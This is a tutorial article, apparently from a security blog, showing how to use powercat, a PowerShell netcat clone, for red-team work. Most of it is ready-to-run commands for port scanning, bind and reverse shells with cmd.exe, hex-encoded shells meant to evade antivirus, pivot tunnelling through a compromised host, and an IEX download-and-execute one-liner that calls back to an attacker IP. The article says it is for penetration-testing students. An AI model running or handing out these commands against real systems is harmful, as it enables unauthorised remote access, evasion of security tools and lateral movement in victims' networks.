Introduction
Powercat is a simple network utility used to perform low level network communication operations. The tool is an implementation of the well-known netcat in powershell. Traditional anti-viruses are known to allow powercat to execute. The installed size of the utility is 68 KB. The portability and platform-independence of the tool makes it an important arrow in every red teamer’s quiver. In this article, we’ll demonstrate and learn the functionality of this tool. You can download this here.
Table of Content
· Basic Options in Powercat
· Setting up Powercat
· Port Scanning
· File Transfer
· Bind Shell
· Reverse Shell
· Standalone Shell
· Encoded Shell
· Tunneling
· Powercat One Liner
Basic Options in Powercat
Powercat supports various options to play around with. We’ll cover the following in this article.
-l | Listen for a connection |
-c | Connect to a listener |
-p | The port to connect to, or listen on |
-e | Execute |
-ep | Execute Powershell |
|
|
|
|
|
|
|
|
Setting up Powercat
Powershell execution policy is a safety feature in Windows which determines which scripts can or cannot run on the system, therefore, we need to set the powershell execution policy to “bypass.” This would allow all scripts to run without restriction. Thereafter, we need to download powercat using wget.
powershell -ep bypass
wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1 -o powercat.ps1
Now that we have downloaded the powercat script, we can import it into the current powershell terminal and then it could be used.
Import-Module .\powercat.ps1
Port Scanning
Powercat is equipped with the functionality to scan for open ports. It is able to do this by attempting a TCP connection to the ports defined. For example, if I have to check for a running service on port 21,22,80,443, we can do this by:
(21,22,80,443) | % {powercat -c 192.168.1.150 -p $_ -t 1 -Verbose -d}
Note that here, we have appended port number as a list variable. The client mode (-c flag) specifies the client to scan. As we can observe in the screenshot below that if the port was found to be open, powercat successfully set up a stream with the service. the disconnect option (-d) flag specifies powercat to disconnect the stream as soon as it gets open. Hence, this is how open ports can be discovered using powercat.
File Transfer
File transfer is possible in powercat by data input in the data stream and fetching it at the client end.
Let’s create a text file called “notes.txt” in the current folder. Here, input flag (-i) is used to input data in the stream. This can be used to move files, byte array object or strings too.
Now, we’ll first set up the listener at client end. Let us use netcat in linux for ease here. After setting it up, we’ll then use powercat to transfer this text file.
nc -lnvp 443 > notes.txt
powercat -c 192.168.1.3 -p 443 -i notes.txt
Now, whatever was in notes.txt has been transferred to our destination. As you can see, the file is successfully created after a successful connection was terminated.
Bind Shell
Bind shell refers to the process where the attacker connects to an open port or listener at the target machine and executes code. To demonstrate this, we’ll set up a listener at the target using netcat and then deliver cmd executable to it.
Attacker -> Powercat
Victim -> Netcat on Kali
In an ideal scenario, the attacker would deliver a code that gets executed and allows the attacker to further communicate with the victim, however, for the sake of simplicity, we’ll just deliver the “cmd” executable to the victim and see if it runs.
nc -lvvp 443
powercat -c 192.168.1.3 -p 443 -e cmd.exe
And thus, we observe that the “cmd” executable indeed gets executed on the victim’s machine.
The same could be achieved between two powercat scripts too. On the listener we set up port 9000 and the attacker to connect and deliver cmd executable:
powercat -l -p 9000 -e cmd -v
powercat -c 192.168.1.145 -p 9000 -v
And as you can see, victim’s machine has processed the executable delivered by the attacker.
Reverse Shell
Reverse shell refers to the process in which the attacker machine has a listener running to which the victim connects and then attacker executes code. Here, Windows (powercat) is the attacker machine with listener running on port 443 and Kali running netcat (victim) shall connect to it. This is achieved by running powercat in listener mode:
powercat -l -p 443 -e cmd
As you can see, as soon as we connect to the listener, we get a shell
nc 192.168.1.145 443
The same can be done with two Windows devices too. Let’s set up a listener on port 9000.
powercat -l -p 9000 -e cmd -v
Now, we’ll use powercat to connect to this listener with the command:
powercat -c 192.168.1.145 -p 9000 -v
whoami
Standalone shell
The option is useful for when a script can be executed in the system. This allows an attacker to code a reverse shell in a “.ps1” file and wait for the script to be executed. Scenario 1: Let’s say a cron job is running that executes a script that has write access. One can copy paste the following command to get reverse shell easily even with no powershell command execution access.
powercat -c 192.168.1.3 -p 443 -e cmd.exe -g > shell.ps1
./shell.ps1
Make sure the listener is running. We are using Kali as an attacker machine using netcat.
nc -lnvp 443
As you can see, there are multiple ways to get an interactive shell on the target machine using netcat.
Encoded Shell
To evade traditional security devices like Anti-Virus solutions, we can encode the shell that we used above. Powercat has a good feature to encode a command to Hexadecimal Array. This way, some of the basic security features can be bypassed. This is done by:
powercat -c 192.168.1.3 -p 443 -e cmd.exe -ge > encodedshell.ps1
And then the shell can be run by using the Powershell -E option which can execute an encoded string.
powershell -E <string>
The string is the encoded value from above.
We had set up a listener in our attacker machine (kali) beforehand and were waiting for the connection. As you can see the shell is getting executed successfully.
Tunneling
Tunneling is the most efficient mechanism of maintaining stealth while doing red team operations or even in real life scenarios. Powershell and powercat can help us with tunnelling and hiding our identity next time we conduct red team assessment.
Here, there are three machines. Here, Attacker communicates with a machine with two LAN cards and attacks a machine running on an alternate subnet (192.168.146.0/24)
Now, let’s assume the attacker already has an access to the tunnel machine. We’ll replicate the scenario using Enter-PSSession command. This utility allows us to get an interactive powershell terminal of the tunnel with the help of credentials.
Enter-PSSession -ComputerName 192.168.1.45 -Credential raj
After we input the credentials, we can see that an interactive powershell session has been spawned.
We run ipconfig as a validator command however, we made an interesting observation. This machine had two LAN cards configured and there was another adapter attached. It is possible that other machines are running on this subnet.
To work on our observation, we’d need powercat in this system. We download it using wget.
wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1 -o powercat.ps1
But before we can run this script, we need to change the execution policy again. Also, upon little searching we found that 192.168.146.129 was alive and responding. Let’s scan this system using powercat
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned
Import-Module .\powercat.ps1
(21, 22, 80, 443) | % { powercat -c 192.168.146.129 -p $_ -t 1 -Verbose -d}
As you can see, there were three ports open: 21,22,80
Now, if we set up a traffic relay here, our attacker system might be able to communicate and connect with SSH on the victim machine (192.168.146.129)
We’ll use powercat to set up a traffic relay:
powercat -lp 9090 -r tcp:192.168.146.129:22 -v
As you can see above, tcp traffic from port 22 on 192.168.146.129 is now being relayed by 192.168.146.128 (tunnel) on port 9090. Thus, from an external system, we use PuTTY to connect to the tunnel machine’s 9090 port which will connect us to the victim machine.
And just like that, we now have completed our tunnel and accessed our victim machine.
We can use powercat to setup relay on port 80 too through which we’ll be able to access the website running on victim.
powercat -l -p 9090 -r tcp:192.168.146.129:80 -v
As evident, the victim is now accessible through this tunnel.
Powercat One Liner
Powercat’s reverse shell exists as a one liner command too. Assume that we have code execution on the victim, we can use powercat’s one liner to get a reverse shell back on the listener running on attacker’s machine. For this process, we need to download powercat in a separate folder and run a web server.
wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1 -o powercat.ps1
python -m SimpleHTTPServer 80
Now, we’ll set up a listener on port 4444 in attacker (kali) machine immediately. Meanwhile, we have code execution on the target and thus, we’ll use the following powershell/powercat one liner:
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.3/powercat.ps1');powercat -c 192.168.1.3 -p 4444 -e cmd"
Soon as we hit enter, we’ll receive a reverse shell on the listener running in Kali.
Conclusion
Hence, we have demonstrated various functionality of powercat in this article. The tool is being readily used in red team assessments and becoming part of major cyber security certification courses. Hope the article helps aspirants/students or analysts to understand the tool in a simple and effective way. Thanks for reading.